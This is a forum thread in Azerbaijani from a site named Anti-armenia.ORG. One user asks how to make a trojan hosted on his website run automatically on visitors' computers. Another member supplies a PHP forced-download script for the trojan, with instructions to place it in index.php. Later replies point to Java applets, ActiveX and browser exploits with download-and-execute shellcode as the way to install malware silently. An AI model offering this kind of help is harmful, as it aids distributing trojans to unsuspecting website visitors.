Anti-armenia.ORG - Forumlar - PHP auto downloader kömək



Istifadəçi
     2015-11-08 10:02 GMT                 

TheConficker


VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Salam dostlar mənə PHP auto dovnloader lazımdır
misal mənim saytım var ora çoxlu proqramlar yerləşdirmişəm ftp-a sayta girən kimi autorun olsun bele bir şey varmı?

Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-08 10:56 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Fikrivi tutmadım açığı. Daha aydın və ətraflı yaz bir zəhmət.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-08 11:50 GMT                 

TheConficker


VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


necə başa salım tutaq ki, mənim trojanım var ftp-a atmışam saytımın ana səhifəsinə yerləşdirmək istəyirəm url-a girəndə kimsə autorun olsun həmin hədəfə

Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-08 17:32 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Bu tipli birşey istifadə edə bilərsən.

Kod:
<?php
$file = "/soxacagin/trojan/pathi";
if(file_exists($file)){
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/x-msdownload");
header("Content-Disposition: attachment; filename=\"". basename($file). "\"");
header("Content-Transfer-Encoding: binary");
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);
}
?>


Amma yadda saxla ki, bu sadəcə yükləmək üçün prompt verəcək. Bunu götürüb index.php at məsəlçün. $file = "/home/user/public_html/tmp/malw.exe"; şəklində malware in pathı ver.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-09 05:53 GMT                 

TheConficker


VIP
Mesaj Sayı : 195
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   6  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


PuN!Sh3r Script üçün təşəkkür edirəm amma mən istədim ki, url-a girən kimi trojan avtomatik temp pathina yada ayrı patha özün run etsin brlə bir şey varmı?

Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-09 08:56 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Sitat
#52894 TheConficker :
PuN!Sh3r Script üçün təşəkkür edirəm amma mən istədim ki, url-a girən kimi trojan avtomatik temp pathina yada ayrı patha özün run etsin brlə bir şey varmı?

Sən dediyin artıq php ilə həll etmək olmur. Çünki belə bir şey üçün sənə browser də run olanda pc də sandbox da işləyəcək bir şey lazımdı. Bunu Java applet lər və ActiveX ilə edə bilərsən.
Ya da browser də vuln olmalıdıki download&execute shellcode məsələn istifadə edib səssizcə malware atıb run edəsən.

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2015-11-09 11:49 GMT                 

SHi3LD


Gold
Mesaj Sayı : 723
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   93  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Hal hazırda dediyin iş qeyri mümkündü Pun!sh3r dediyi kimi auto run olunması üçün browserdə və ya istifadə etdiyi pluginlərdə vuln olmalıdı.

Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG